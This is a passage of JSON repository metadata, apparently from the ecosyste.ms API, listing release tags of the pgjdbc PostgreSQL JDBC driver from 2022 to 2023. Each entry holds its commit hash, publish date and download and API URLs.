parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2/manifests"},{"name":"REL42.7.1-rc1","sha":"bb577e0a7afb0df74a9a00d43896ada2c1dd0dfc","kind":"tag","published_at":"2023-12-06T15:08:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1/manifests"},{"name":"REL42.7.0","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T19:04:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0/manifests"},{"name":"REL42.7.0-rc3","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T18:11:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3/manifests"},{"name":"REL42.6.0","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:10:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0/manifests"},{"name":"REL42.6.0-rc1","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:07:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1/manifests"},{"name":"REL42.5.4","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:41:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4/manifests"},{"name":"REL42.5.4-rc1","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:26:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1/manifests"},{"name":"REL42.5.3","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:23:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3/manifests"},{"name":"REL42.5.3-rc2","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:19:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2/manifests"},{"name":"REL42.5.3-rc1","sha":"d2f77a26815e7994db7ac4d816d29d6d7395418d","kind":"tag","published_at":"2023-02-03T15:07:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1/manifests"},{"name":"REL42.5.2-rc2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"tag","published_at":"2023-02-01T13:20:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2/manifests"},{"name":"REL42.5.2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"commit","published_at":"2023-01-31T20:40:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2/manifests"},{"name":"REL42.5.2-rc1","sha":"e7239c1f8e1f8757fbe3b50ba4c967ea85cdf12e","kind":"tag","published_at":"2023-01-13T20:43:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1/manifests"},{"name":"REL42.5.1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:36:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1/manifests"},{"name":"REL42.5.1-rc1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:32:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1/manifests"},{"name":"REL42.4.3","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T14:02:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3/manifests"},{"name":"REL42.4.3-rc1","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T13:58:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1/manifests"},{"name":"REL42.3.8","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:47:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8/manifests"},{"name":"REL42.3.8-rc1","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:37:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1/manifests"},{"name":"REL42.2.27","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:33:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27/manifests"},{"name":"REL42.2.27-rc1","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:30:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1/manifests"},{"name":"REL42.3.7","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:53:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7/manifests"},{"name":"REL42.3.7-rc1","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:43:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1/manifests"},{"name":"REL42.5.0","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:25:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0/manifests"},{"name":"REL42.5.0-rc1","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:11:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1/manifests"},{"name":"REL42.4.2","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:39:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2/manifests"},{"name":"REL42.4.2-rc1","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:22:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1/manifests"},{"name":"REL42.2.26","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:21:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26/manifests"},{"name":"REL42.2.26-rc2","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:20:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2/manifests"},{"name":"REL42.2.26-rc1","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:16:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1/manifests"},{"name":"REL42.4.1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T13:14:28.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1/manifests"},{"name":"REL42.4.1-rc1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T12:58:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1/manifests"},{"name":"REL42.4.0","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T15:58:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0/manifests"},{"name":"REL42.4.0-rc1","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T14:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1/manifests"},{"name":"REL42.3.6","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:19:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6/manifests"},{"name":"REL42.3.6-rc1","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:11:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1/manifests"},{"name":"REL42.3.5","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T15:41:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5/manifests"},{"name":"REL42.3.5-rc1","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T14:50:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1/manifests"},{"name":"REL42.3.4","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:48:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4/manifests"},{"name":"REL42.3.4-rc1","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1/manifests"},{"name":"REL42.3.3","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:24:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3","tag_u